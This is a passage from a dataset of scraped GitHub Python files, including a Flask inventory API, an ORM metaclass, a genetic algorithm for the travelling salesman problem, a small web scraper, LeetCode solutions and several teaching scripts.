{}'.format(int(song['pos']), format_song(song, arguments)))\n","repo_name":"fenhl/syncbin","sub_path":"python/playlist.py","file_name":"playlist.py","file_ext":"py","file_size_in_byte":5797,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"7258457492","text":"from flask import Flask, request\nfrom model import db, Inventory\nfrom query_object.itemQO import ItemQO\nfrom query_object.filterQO import FilterQO\nfrom config import Config\n\napp = Flask(__name__)\nconfig = Config()\napp.config['SQLALCHEMY_DATABASE_URI'] = config.DB_PATH\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb.init_app(app)\n\n\n@app.route('/insert', methods=['POST'])\ndef insert():\n request_data = request.get_json()\n itemQo = ItemQO(request_data.get('name', ''),\n request_data.get('category', ''),\n request_data.get('price', ''))\n return Inventory.insert(itemQo)\n\n\n@app.route('/filter', methods=['POST'])\ndef filter():\n request_data = request.get_json()\n filterQo = FilterQO(request_data.get('dt_from', ''),\n request_data.get('dt_to', ''))\n return Inventory.filter(filterQo)\n\n\n@app.route('/category', methods=['POST'])\ndef category():\n request_data = request.get_json()\n return Inventory.categorize(request_data.get('category', ''))\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5001)\n","repo_name":"kingsleylow0327/inventory_management","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"19134124233","text":"# JSON is commonly used with data APIs.\n# We can parse JSON into a Python dictionary.\n\nimport json\n\n# Sample JSON\nuserJson = '{\"firstName\": \"Louis\", \"lastName\": \"Higgins\", \"age\": 42}'\n\n# Parse to dictionary\nuser = json.loads(userJson)\n\nprint(user)\nprint(user['firstName'])\n\n# Parse dictionary to JSON\ncar = {'Make': 'Ford', 'Model': 'Mustang', 'Year': 1970}\ncarJson = json.dumps(car)\n\nprint(carJson)","repo_name":"misterjeff/Python","sub_path":"TraversyCrashCourse/pyJson.py","file_name":"pyJson.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"32935155782","text":"from collections import OrderedDict\n\nfrom .relmanager import RelManager\nfrom .fields import Field, ForeignKey, OneToOneField\nfrom .utils import tznow\nfrom . import signals\n\n# Architecture\n#\n# This is complicated enough to warrant some explanation.\n#\n# A Model class has a Meta instance.\n#\n# The Fields are instances in the Meta instance.\n#\n# For a given Model, all Field instances are shared since there is only\n# one Meta instance for that Model class. This means that a field can't know\n# it's exact Model instance, only it's parent Model class.\n\n\n# from: http://stackoverflow.com/questions/12006267/how-do-django-models-work\n# from: lib/python2.7/site-packages/django/db/models/base.py\n#\n# remember that `type` is actually a class like `str` and `int`\n# so you can inherit from it\nclass MetaModel(type):\n \"\"\"\n *do not use this class directly*\n\n *code reviews of this class are very welcome*\n\n base class for :class:`alkali.model.Model`.\n\n this complicated metaclass is required to convert a stylized class\n into a useful concrete one. it converts :class:`alkali.fields.Field`\n variables into their base types as attributes on the instantiated\n class.\n\n **Meta**: adds a ``Meta`` class if not already defined in ``Model``\n derived class\n\n **objects**: :class:`alkali.manager.Manager`\n \"\"\"\n\n # this called once per Model _definition_\n # __new__ is the method called before __init__\n # meta_class is _this_ class, aka: MetaModel\n # this makes a new MetaModel instance\n def __new__(meta_class, name, bases, attrs):\n #print \"__new__ cls:\",type(meta_class),meta_class,name\n super_new = super(MetaModel, meta_class).__new__\n\n # Also ensure initialization is only performed for subclasses of Model\n # (excluding Model class itself). This keeps all of Models attrs intact.\n if not any( map( lambda b: isinstance(b, MetaModel), bases ) ):\n new_class = super_new(meta_class, name, bases, attrs)\n return new_class\n\n # new_class is an instance of 'name' (aka Model) whose type is MetaModel\n # print \"new_class\", type(new_class), new_class\n # new_class \n new_class = super_new(meta_class, name, bases, {})\n new_class._add_meta( attrs )\n new_class._add_fields()\n new_class._add_manager()\n new_class._add_relmanagers()\n new_class._add_exceptions()\n\n # put the rest of the attributes (methods and properties)\n # defined in the Model derived class into the \"new\" Model\n for name, attr in attrs.items():\n setattr(new_class, name, attr)\n\n signals.model_creation.send(meta_class, model=new_class)\n\n return new_class\n\n def _add_manager( new_class ):\n from .manager import Manager\n setattr( new_class, 'objects', Manager(new_class) )\n\n def _add_relmanagers( new_class ):\n \"\"\"\n if this class has foreign keys then we need to add the\n reverse lookup into the *other* model\n \"\"\"\n for name, field in new_class.Meta.fields.items():\n if not isinstance(field, ForeignKey):\n continue\n\n # note the name=name in the lambda, this is vital to capture\n # the current value of name and not the last of the loop\n # more info: http://stackoverflow.com/questions/2295290\n rel_manager = property(\n lambda fm_instance, name=name: RelManager(fm_instance, new_class, name)\n )\n set_name = \"{}_set\".format(new_class.__name__).lower()\n setattr( field.foreign_model, set_name, rel_manager )\n\n signals.pre_delete.connect(\n new_class.objects.cb_delete_foreign,\n sender=field.foreign_model)\n\n if isinstance(field, OneToOneField):\n signals.post_save.connect(\n new_class.objects.cb_create_foreign,\n sender=field.foreign_model)\n\n def _add_exceptions( new_class ):\n from .model import ObjectDoesNotExist\n\n # dynamically create a new class types\n DoesNotExist = type('DoesNotExist', (ObjectDoesNotExist,), {} )\n EmptyPrimaryKey = type('EmptyPrimaryKey', (Exception,), {} )\n MultipleObjectsReturned = type('MultipleObjectsReturned', (Exception,), {} )\n\n setattr( new_class, 'ObjectDoesNotExist', ObjectDoesNotExist )\n setattr( new_class, 'DoesNotExist', DoesNotExist )\n setattr( new_class, 'EmptyPrimaryKey', EmptyPrimaryKey )\n setattr( new_class, 'MultipleObjectsReturned', MultipleObjectsReturned )\n\n def _add_meta( new_class, attrs ):\n\n def _get_fields( attrs ):\n return [(k, v) for k, v in attrs.items() if isinstance(v, Field)]\n\n def _get_field_order(attrs):\n \"\"\"\n returns field names in the order they were defined in the class\n \"\"\"\n fields = _get_fields(attrs)\n fields.sort(key=lambda e: e[1]._order)\n return [k for k, _ in fields]\n\n class Object():\n pass\n\n # Meta is an instance in Model class\n # all following properties on the Meta class, not instance\n meta = attrs.pop( 'Meta', Object )\n setattr( new_class, 'Meta', meta() )\n\n if not hasattr(meta, 'filename'):\n meta.filename = None\n\n if not hasattr(meta, 'storage'):\n meta.storage = None\n\n if not hasattr(meta, 'ordering'):\n meta.ordering = _get_field_order(attrs)\n\n meta.field_filter = lambda self, field_type: \\\n [n for n, f in self.fields.items() if isinstance(f, field_type)]\n\n # don't let user miss a field if they've defined Meta.ordering\n assert len(meta.ordering) == len(_get_fields(attrs)), \\\n \"missing/extra fields defined in Meta.ordering\"\n\n # put the fields into the meta class\n # meta.ordering contains field names, attrs contains Field types\n meta.fields = OrderedDict()\n for field in meta.ordering:\n meta.fields[field] = attrs.pop(field)\n delattr( meta.fields[field], '_order' )\n\n # make sure 'pk' isn't a field name, etc\n for d in ['pk']:\n assert d not in meta.fields\n\n # you can set a property on a class but it will only be called on an instance\n # I'd prefer this to be a read-only property but I guess that can't happen\n #\n # note: don't use a dict comprehension because interim dict will have keys\n # inserted in random order\n meta.pk_fields = OrderedDict(\n [(name, field) for name, field in meta.fields.items() if field.primary_key]\n )\n\n # monkey patch stupid fucking iterators\n meta.pk_fields._keys = meta.pk_fields.keys\n meta.pk_fields.keys = lambda: list(meta.pk_fields._keys())\n meta.pk_fields._values = meta.pk_fields.values\n meta.pk_fields.values = lambda: list(meta.pk_fields._values())\n\n meta.fields._keys = meta.fields.keys\n meta.fields.keys = lambda: list(meta.fields._keys())\n meta.fields._values = meta.fields.values\n meta.fields.values = lambda: list(meta.fields._values())\n\n if len(meta.fields):\n assert len(meta.pk_fields) > 0, \"no primary_key defined in fields\"\n\n def _add_fields( new_class ):\n \"\"\"\n put the Field reference into new_class\n \"\"\"\n meta = new_class.Meta\n\n # add properties to field\n for name, field in meta.fields.items():\n field._name = name\n fget = lambda self: getattr(self, '_name')\n setattr( field.__class__, 'name', property(fget=fget) )\n\n field._model = new_class\n fget = lambda self: getattr(self, '_model')\n setattr( field.__class__, 'model', property(fget=fget) )\n\n fget = lambda self: self.model.Meta\n setattr( field.__class__, 'meta', property(fget=fget) )\n\n # put fields in model\n for name, field in meta.fields.items():\n # make magic property model.fieldname_field that returns Field object\n fget = lambda self, name=name: self.Meta.fields[name]\n setattr( new_class, name + '__field', property(fget=fget) )\n\n # set the Field descriptor object on the model class\n # which makes it accessable on the model instance\n #\n # the field can't be a property to Meta.fields[name]\n # because then the descriptor-ness is lost and a normal\n # getattr is called on the model instance\n setattr( new_class, name, field )\n\n # creates a new instance of derived model, this is called each\n # time a Model instance is created\n def __call__(cls, *args, **kw):\n obj = cls.__new__(cls, *args)\n\n if 'pk' in kw:\n assert len(cls.Meta.pk_fields) == 1, \"can't currently set compound primary key via kwargs\"\n\n field_name = cls.Meta.pk_fields.keys()[0]\n assert field_name not in kw, \"can't pass in 'pk' and actual pk field name\"\n\n value = kw.pop('pk')\n kw[field_name] = value\n\n # put field values (int,str,etc) into model instance\n for name, field in cls.Meta.fields.items():\n if getattr(field, 'auto_now', False):\n value = kw.pop(name, tznow().isoformat())\n elif getattr(field, 'auto_now_add', False):\n value = kw.pop(name, tznow().isoformat())\n else:\n # THINK: this somewhat duplicates Field.__set__ code\n value = kw.pop(name, field.default_value)\n\n value = field.cast(value)\n\n # store the actual value in the model's __dict__, used by Field.__get__\n obj.__dict__[name] = value\n\n obj._dirty = False\n obj.__init__(*args, **kw)\n\n return obj\n","repo_name":"kneufeld/alkali","sub_path":"alkali/metamodel.py","file_name":"metamodel.py","file_ext":"py","file_size_in_byte":10018,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"39"} +{"seq_id":"11723131283","text":"def generator(input_ids,attention_mask,send_s_po,start_tokens,end_tokens,c_relation,batch_size):\n i=0\n while 1:\n input_ids_b = input_ids[i*batch_size:(i+1)*batch_size]\n attention_mask_b = attention_mask[i*batch_size:(i+1)*batch_size]\n send_s_po_b = send_s_po[i*batch_size:(i+1)*batch_size]\n start_tokens_b = start_tokens[i*batch_size:(i+1)*batch_size]\n end_tokens_b = end_tokens[i*batch_size:(i+1)*batch_size]\n c_relation_b = c_relation[i*batch_size:(i+1)*batch_size]\n # 最重要的就是这个yield,它代表返回,返回以后循环还是会继续,然后再返回。就比如有一个机器一直在作累加运算,但是会把每次累加中间结果告诉你一样,直到把所有数加完\n yield({'input_1': input_ids_b, 'input_2': attention_mask_b,'input_3':send_s_po_b}, \n {'s_start': start_tokens_b,'s_end':end_tokens_b,'relation':c_relation_b})\n i = (i+1)%(len(input_ids)//batch_size)\n \nmodel.fit_generator(generator(input_ids,attention_mask,send_s_po,start_tokens,end_tokens,c_relation,batch_size),epochs=eopch,steps_per_epoch=steps_per_epoch,verbose=1,\n callbacks=[Metrics(model_2,model_3,id2p,va_text_list,va_spo_list,va_input_ids,va_attention_mask,tokenizer)])\n","repo_name":"zhengyanzhao1997/NLP-model","sub_path":"model/Trick/fit_generator.py","file_name":"fit_generator.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":265,"dataset":"github-code","pt":"39"} +{"seq_id":"31692147134","text":"import time\nimport numpy as np\nfrom tqdm import trange\nimport matplotlib.pyplot as plt\n\n\n\ndef PMX(ind1, ind2, separator_no=2):\n new_ind1, new_ind2 = ind1.copy(), ind2.copy()\n idxs = sorted(np.random.choice(len(ind1), separator_no, replace=False))\n \n group = np.random.choice(separator_no-1)\n start, end = idxs[group], idxs[group+1]\n \n tmp = ind1[start:end].copy()\n ind1[start:end] = ind2[start:end]\n ind2[start:end] = tmp\n \n for i in range(len(ind1)):\n if start <= i < end:\n continue\n \n while ind1[i] in ind1[start:end]:\n # get elem from the other ind\n idx_of_elem = np.nonzero(ind1[start:end] == ind1[i])[0][0]\n ind1[i] = ind2[start+idx_of_elem]\n \n while ind2[i] in ind2[start:end]:\n # get elem from the other ind\n idx_of_elem = np.nonzero(ind2[start:end] == ind2[i])[0][0]\n ind2[i] = ind1[start+idx_of_elem]\n\n return ind1, ind2\n\ndef tsp_objective_function(p, dist):\n s = 0.0\n for i in range(len(p)):\n s += dist[p[i-1], p[i]]\n return s\n\ndef reverse_sequence_mutation(p, *args):\n a = np.random.choice(len(p), 2, False)\n i, j = a.min(), a.max()\n q = p.copy()\n q[i:j+1] = q[i:j+1][::-1]\n return q\n\ndef default_generate_population_function(chromosome_length, population_size):\n current_population = np.array([np.random.permutation(chromosome_length).astype(np.int64) \n for _ in range(population_size)])\n return current_population\n\n\nclass SGA:\n \n def __init__(self, population_size, chromosome_length, distance_matrix, crossover_func=PMX, objective_func=tsp_objective_function, mutation_func=reverse_sequence_mutation, generate_population_func=default_generate_population_function, replace_method='mu+lambda', number_of_offspring=None, crossover_probability = 0.95, mutation_probability = 0.25, number_of_iterations = 250, no_groups=2):\n \n self.population_size = population_size\n self.chromosome_length = chromosome_length\n \n self.crossover_func = crossover_func\n self.objective_func = objective_func\n self.mutation_func = mutation_func\n self.generate_population_func = generate_population_func\n self.distance_matrix = distance_matrix\n \n if number_of_offspring is None:\n number_of_offspring = population_size\n self.number_of_offspring = number_of_offspring\n self.crossover_probability = crossover_probability\n self.mutation_probability = mutation_probability\n self.number_of_iterations = number_of_iterations\n assert replace_method in ['mu+lambda', 'lambda'], 'wrong replace_method: [\"mu+lambda\", \"lambda\"]'\n self.replace_method = replace_method\n self.no_groups = no_groups\n \n \n def run(self, verbose=False, with_tqdm=False):\n time0 = time.time()\n self.mean_costs = np.zeros(self.number_of_iterations)\n self.min_costs = np.zeros(self.number_of_iterations)\n self.max_costs = np.zeros(self.number_of_iterations)\n\n self.best_objective_value = np.Inf\n self.best_chromosome = np.zeros((1, self.chromosome_length))\n\n current_population = self._generate_random_population()\n objective_values = np.array(list(map(lambda ind: self.objective_func(ind, self.distance_matrix), current_population)))\n \n if with_tqdm:\n range_ = trange(self.number_of_iterations, position=0, leave=True)\n else:\n range_ = range(self.number_of_iterations)\n \n for t in range_:\n parent_indices = self._select_parent_indices(objective_values)\n\n children_population = self._generate_children_population(current_population, parent_indices)\n\n self._mutate_children_population(children_population)\n\n children_objective_values = self._eval_children(children_population)\n \n current_population, objective_values = self._replace_population(current_population, objective_values, children_population, children_objective_values)\n\n # recording some statistics\n if self.best_objective_value < objective_values[0]:\n self.best_objective_value = objective_values[0]\n self.best_chromosome = current_population[0, :]\n \n self.mean_costs[t] = objective_values.mean()\n self.min_costs[t] = objective_values.min()\n self.max_costs[t] = objective_values.max()\n \n if verbose:\n print('%3d %14.8f %12.8f %12.8f %12.8f %12.8f' % (t, time.time() - time0, objective_values.min(), objective_values.mean(), objective_values.max(), objective_values.std()))\n \n \n def plot_costs(self, title=''):\n plt.title(title)\n plt.plot(self.max_costs, label='max')\n plt.plot(self.min_costs, label='min')\n plt.plot(self.mean_costs, label='mean')\n plt.show()\n \n \n def _generate_random_population(self):\n return self.generate_population_func(self.chromosome_length, self.population_size)\n \n \n def _generate_children_population(self, current_population, parent_indices):\n children_population = np.zeros((self.number_of_offspring, self.chromosome_length), dtype=np.int64)\n \n for i in range(self.number_of_offspring//2):\n if np.random.random() < self.crossover_probability:\n children_population[2*i, :], children_population[2*i+1, :] = self.crossover_func(current_population[parent_indices[2*i], :].copy(), current_population[parent_indices[2*i+1], :].copy(), self.no_groups)\n else:\n children_population[2*i, :], children_population[2*i+1, :] = current_population[parent_indices[2*i], :].copy(), current_population[parent_indices[2*i+1]].copy()\n\n if np.mod(self.number_of_offspring, 2) == 1:\n children_population[-1, :] = current_population[parent_indices[-1], :]\n \n return children_population\n \n \n def _select_parent_indices(self, objective_values):\n fitness_values = objective_values.max() - objective_values\n \n if fitness_values.sum() > 0:\n fitness_values = fitness_values / fitness_values.sum()\n else:\n fitness_values = np.ones(self.population_size) / self.population_size\n parent_indices = np.random.choice(self.population_size, self.number_of_offspring, \n True, fitness_values).astype(np.int64)\n return parent_indices\n \n \n def _mutate_children_population(self, children_population):\n for i in range(self.number_of_offspring):\n if np.random.random() < self.mutation_probability:\n children_population[i, :] = self.mutation_func(children_population[i, :], self.no_groups)\n \n \n def _eval_children(self, children_population):\n children_objective_values = np.zeros(self.number_of_offspring)\n for i in range(self.number_of_offspring):\n children_objective_values[i] = self.objective_func(children_population[i, :], self.distance_matrix)\n return children_objective_values\n \n \n def _replace_population(self, current_population, objective_values, children_population, children_objective_values):\n if self.replace_method == 'mu+lambda':\n objective_values = np.hstack([objective_values, children_objective_values])\n current_population = np.vstack([current_population, children_population])\n\n idxs = np.argsort(objective_values)\n current_population = current_population[idxs[:self.population_size], :]\n objective_values = objective_values[idxs[:self.population_size]]\n elif self.replace_method == 'lambda':\n current_population = children_population\n objective_values = children_objective_values\n \n return current_population, objective_values","repo_name":"jgrodzicki/UWR-II","sub_path":"Algorytmy Ewolucyjne/Assignment 2/SGA.py","file_name":"SGA.py","file_ext":"py","file_size_in_byte":8034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"5267155337","text":"import time\nimport tkinter\nimport tkinter.messagebox\n\ndef download():\n # 模拟下载任务需要花费10秒钟时间\n time.sleep(10)\n tkinter.messagebox.showinfo('提示', '下载完成!')\n\n# 显示信息\ndef show_about():\n tkinter.messagebox.showinfo('关于', '作者: 骆昊(v1.0)')\n\ndef main():\n # 建议一个页面\n top = tkinter.Tk()\n # 标题\n top.title('单线程')\n # 窗口大小\n top.geometry('200x150')\n top.wm_attributes('-topmost', True)\n\n # 面板\n panel = tkinter.Frame(top)\n # 下载 按钮\n button1 = tkinter.Button(panel, text='下载', command=download)\n button1.pack(side='left')\n # 关于 按钮\n button2 = tkinter.Button(panel, text='关于', command=show_about)\n button2.pack(side='right')\n panel.pack(side='bottom')\n\n tkinter.mainloop()\n\nif __name__ == '__main__':\n main()","repo_name":"PorterZhang2021/Python-StudyNotes","sub_path":"1.Python-100-Days-StudyNotes/基础篇/代码/Day13/code_8.py","file_name":"code_8.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"28025526495","text":"from flask import Flask, jsonify, request\nfrom flask_cors import CORS\nimport requests\nfrom bs4 import BeautifulSoup\n\napp = Flask(__name__)\nCORS(app)\n\n@app.route('/scrape', methods=['GET', 'POST'])\ndef scrape():\n if request.method == 'POST':\n url = request.form.get('url_to_scrape', 'http://localhost/my_git/python/app_1/test.html') # Use POST field if available\n else:\n url = 'http://localhost/my_git/python/app_1/test.html' # Default URL to scrape\n\n headers = {'User-Agent': 'Mozilla/5.0'}\n r = requests.get(url, headers=headers)\n \n if r.status_code == 200:\n soup = BeautifulSoup(r.content, 'html.parser')\n items = []\n\n for a_tag in soup.find_all('a', class_='something'):\n items.append(a_tag.text)\n\n return jsonify({'items': items})\n else:\n return jsonify({'error': 'Failed to retrieve data', 'status_code': r.status_code})\n\n@app.route('/another', methods=['GET'])\ndef another_route():\n page = request.args.get('page', 0, type=int)\n name = request.args.get('name', \"\", type=str)\n print(f\"Page variable is: {page}\")\n return jsonify({\"message\": \"Hello from another route!\", \"page\" : page, \"name\" : name})\n\n@app.route('/test', methods=['POST'])\ndef test_route():\n name = request.form.get('name', 'Anonymous') # Default to \"Anonymous\" if \"name\" is not provided\n return jsonify({\"message\": f\"Hello, {name}!\"})\n\nif __name__ == '__main__':\n app.run(port=5000)\n","repo_name":"xrvel/python","sub_path":"app_1/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"71759144435","text":"# 给定 m x n 矩阵 matrix 。\n#\n# 你可以从中选出任意数量的列并翻转其上的 每个 单元格。(即翻转后,单元格的值从 0 变成 1,或者从 1 变为 0 。)\n#\n# 返回 经过一些翻转后,行与行之间所有值都相等的最大行数 。\n#\n#\n#\n# 示例 1:\n#\n# 输入:matrix = [[0,1],[1,1]]\n# 输出:1\n# 解释:不进行翻转,有 1 行所有值都相等。\n# 示例 2:\n#\n# 输入:matrix = [[0,1],[1,0]]\n# 输出:2\n# 解释:翻转第一列的值之后,这两行都由相等的值组成。\n# 示例 3:\n#\n# 输入:matrix = [[0,0,0],[0,0,1],[1,1,0]]\n# 输出:2\n# 解释:翻转前两列的值之后,后两行由相等的值组成。\n#\n#\n# 提示:\n#\n# m == matrix.length\n# n == matrix[i].length\n# 1 <= m, n <= 300\n# matrix[i][j] == 0 或 1\nfrom collections import Counter\nfrom typing import List\n\n\nclass Solution:\n def maxEqualRowsAfterFlips1(self, matrix: List[List[int]]) -> int:\n r, c = len(matrix), len(matrix[0])\n n_group = 1\n group = [range(r)]\n def divide(l, j): # l 是一个分组的所有下标列表,第 j 列与第 0 列 对应行进行异或运算,按结果进行分组\n a, b = [], []\n for i in l:\n if matrix[i][0] ^ matrix[i][j]:\n a.append(i)\n else:\n b.append(i)\n if len(a) > len(b):\n return a, b\n return b, a\n for i in range(1, c):\n for k, g in enumerate(group):\n if len(g) == 0: continue\n a, b = divide(g, i)\n if len(b) == 0: continue\n group[k] = a\n group.append(b)\n return max(len(g) for g in group)\n\n def maxEqualRowsAfterFlips(self, matrix: List[List[int]]) -> int:\n # 更简洁的方法\n r, c = len(matrix), len(matrix[0])\n nums = [0] * r\n for i in range(r):\n reverse = True if matrix[i][0] == 1 else False\n for j in range(c):\n if reverse:\n matrix[i][j] ^= 1\n nums[i] = (nums[i] << 1) + matrix[i][j]\n c = Counter(nums)\n return max(c.values())\n\n","repo_name":"wangsun39/leetcode","sub_path":"all-code/1000-1100/1072maxEqualRowsAfterFlips.py","file_name":"1072maxEqualRowsAfterFlips.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"17694288372","text":"class SumNums():\n def __init__(self,nums,target):\n self.nums=nums\n self.target=target\n numbers=[]\n index=[]\n for i in self.nums:\n numbers.append(i)\n numbers.sort()\n numbers.reverse()\n for i in numbers:\n if self.target-i>=0:\n for j in self.nums:\n if i==j:\n index.append(self.nums.index(j))\n self.target-=i\n index.sort()\n for i in index:\n print('index-',i)\nprint(SumNums([2,4,3,1],7))","repo_name":"knnaliev95/InterviewPreparation","sub_path":"sumnums.py","file_name":"sumnums.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"40803889921","text":"import sys\nsys.stdin = open('input.txt', 'r')\n\n# 빨간 구슬을 구멍을통해 빼냄\n# 보드에 구멍이 하나 있따\n# 게임이 실패하는 경우 -1 을 출력한다\n# 1. 파란 구슬이 구멍에 들어가면 x 2. 동시에 빠져도 실패 3.더이상 구슬이 움직이지 x\n# 중력\n\nn, m = map(int, input().split())\narr = list(list(input()) for _ in range(n))\n\n################### DAY 9, 백준 코드랑 비교\nrx = ry = bx = by = gx = gy = 0\nfor i in range(n):\n for j in range(m):\n # 빨간 공\n if arr[i][j] == 'R':\n rx, ry = i, j\n arr[i][j] = '.'\n # 파란 공\n elif arr[i][j] == 'B':\n bx, by = i, j\n arr[i][j] = '.'\n elif arr[i][j] == 'O':\n gx, gy = i, j\n# print(gx, gy)\ndef inbox(x, y):\n if 0 <= x < n and 0 <= y < m and arr[x][y] != '#':\n return True\n else:\n return False\n\ndef gravity(x, y, dx, dy):\n\n while True:\n # 벽을 만나서 멈추면\n if not inbox(x, y):\n x -= dx\n y -= dy\n return x, y\n if x == gx and y == gy:\n return x, y\n x += dx\n y += dy\n\n\ndef bfs(ri, rj, bi, bj):\n visited = {(i, j, ii, jj): 0 for i in range(n) for j in range(m) for ii in range(n) for jj in range(m)}\n visited[(ri, rj, bi, bj)] = 1\n q = [(0, ri, rj, bi, bj)]\n while q:\n d, rx, ry, bx, by = q.pop(0)\n # if d > 10: return -1\n # print(d, rx, ry, bx, by)\n for dx, dy in (0, 1), (1, 0), (0, -1), (-1, 0):\n red = gravity(rx, ry, dx, dy)\n blue = gravity(bx, by, dx, dy)\n nrx, nry = red[0], red[1]\n nbx, nby = blue[0], blue[1]\n # 두 개다 빠진 경우\n if arr[nrx][nry] == 'O' and arr[nbx][nby] == 'O':\n continue\n # 두 개 좌표가 같을 경우\n # 더 가까이 있던 공을 위치로\n if red == blue:\n reddis = abs(rx-nrx) + abs(ry-nry)\n bluedis = abs(bx-nbx) + abs(by-nby)\n if reddis > bluedis:\n nrx -= dx\n nry -= dy\n else:\n nbx -= dx\n nby -= dy\n\n # 파란공만 빠진 경우\n if arr[nrx][nry] != 'O' and arr[nbx][nby] == 'O':\n continue\n # 빨간공이 빠졌을 경우\n if arr[nrx][nry] == 'O' and arr[nbx][nby] != 'O':\n return d+1\n if rx == nrx and ry == nry and bx == nbx and by == nby:continue\n if visited[(nrx, nry, nbx, nby)]: continue\n visited[(nrx, nry, nbx, nby)] = 1\n q.append((d+1, nrx, nry, nbx, nby))\n return -1\n\n\nprint(bfs(rx, ry, bx, by))\n# 뭐부터 검사해야하는지 순서가 무척 중요했다\n# 아... visited 체크를 안했다..바보다 바보 ..","repo_name":"sigk218/algorithm_100","sub_path":"2019-2020.08/93_baekjoon_구슬탈출.py","file_name":"93_baekjoon_구슬탈출.py","file_ext":"py","file_size_in_byte":2892,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"11235727402","text":"# pylint: disable=C0114, C0115, E5142\nfrom django.db import models\nfrom django.contrib.auth.models import User\n\n# Base class for all feed activities\nclass Activity(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n last_modified = models.DateTimeField(auto_now=True)\n\n class Meta:\n ordering = [\"-last_modified\"]\n","repo_name":"ChicoState/readerhub","sub_path":"app1/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"32422382603","text":"import re\n# Написать регулярное выражение, определяющее является ли данная строка \n#строкой \"abcdefghijklmnopqrstuv18340\" или нет.\ndef stringing(a):\n if not a :\n return False\n str='abcdefghijklmnopqrstuv18340'\n result = re.findall(a, str) \n if result==str.split():\n return True\n else:\n return False\n ","repo_name":"inessa111/Program-engineering-","sub_path":"Labs/LR1/module/lr1_2.py","file_name":"lr1_2.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"15550178052","text":"def solve(n, k):\n cnt = 0\n for d in range(1, n + 1):\n if n % d == 0:\n cnt += 1\n if cnt == k:\n return d\n return 0\n\nN, K = map(int, input().split())\nprint(solve(N, K))","repo_name":"joonion/computational-thinking-for-coding","sub_path":"Chap.04.Sorting&Searching/2501.약수구하기/solve.1.py","file_name":"solve.1.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"7593650262","text":"import matplotlib.pyplot as plt\nimport csv\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\nimport numpy as np\n\n\ndef read_grid(File):\n ''' \n read_grid - Reads a CSV file\n Parameters\n ----------\n File : CSV file\n \n Returns\n -------\n X : X axis of grid : Numpy array\n Y : Y axis of grid : Numpy array\n Grid : XY grid of energies : 2d numpy array\n '''\n Data = np.genfromtxt(File, delimiter=',', dtype=\"float\")\n \n X = Data[0]\n X = np.delete(X, 0)\n Y = (Data[:,0])\n Y = np.delete(Y, 0)\n\n Grid = np.array([])\n \n for i in range(1, (X.size + 1)):\n Temp = Data[:,i]\n Temp = np.delete(Temp, 0)\n Grid = np.append(Grid, Temp)\n \n Grid = np.reshape(Grid, (X.size, Y.size))\n return X, Y, Grid \n\ndef grid_plot(X, Y, Grid):\n '''\n grid_plot - Plot the energy surface\n \n Parameters\n ----------\n X : X axis of grid : Numpy array\n Y : Y axis of grid : Numpy array\n Grid : XY grid of energies : 2d numpy array\n '''\n X, Y = np.meshgrid(X, Y)\n plt.contourf(X, Y, Grid, 25, cmap='jet', interpolation='nearest')\n plt.xlabel(\"Displacement in X (\" r'$\\AA$' \")\", fontsize=18)\n plt.ylabel(\"Displacement in Y (\" r'$\\AA$' \")\", fontsize=18)\n plt.tick_params(labelsize=14)\n plt.tight_layout()\n plt.colorbar()\n plt.savefig(\"Surface_Plot.png\", dpi=600)\n plt.close()\n\n\n\nX, Y, Grid = read_grid(\"grid.csv\")\ngrid_plot(X, Y, Grid)\n\n\n\n","repo_name":"symmy596/Metadise_GB_Scripts","sub_path":"GB-Surface.py","file_name":"GB-Surface.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"25884598624","text":"from django.shortcuts import render, get_list_or_404\n\nfrom django.http import HttpResponse\nfrom .models import SkinType, SkinConcern, Option, Question, Questionnaire, QuestionnaireUserData, QuestionnaireEntry\nfrom home.models import Ingredient, Base, MixingAgent, Recipe, FacePack, CustomFacePack, SkinTypeIngredient, SkinTypeConcernIngredient\nfrom django.contrib.auth.models import User\nfrom cart.models import Cart\nfrom userregistration.views import init_user_login\nfrom home.views import cart_size, get_valid_user_data\nfrom django.db.models import Q\nimport json\nimport random\nimport pdb\n\n# Create your views here.\n\ndef wizard(request):\n data = [] \n for q in Question.objects.all():\n data.append({ \n 'id' : q.id,\n 'name' : q.name,\n 'why' : q.why,\n 'multiple' : 'multiple' if q.id == 8 else '',\n 'options' : [{\n 'name': o['option__name'],\n 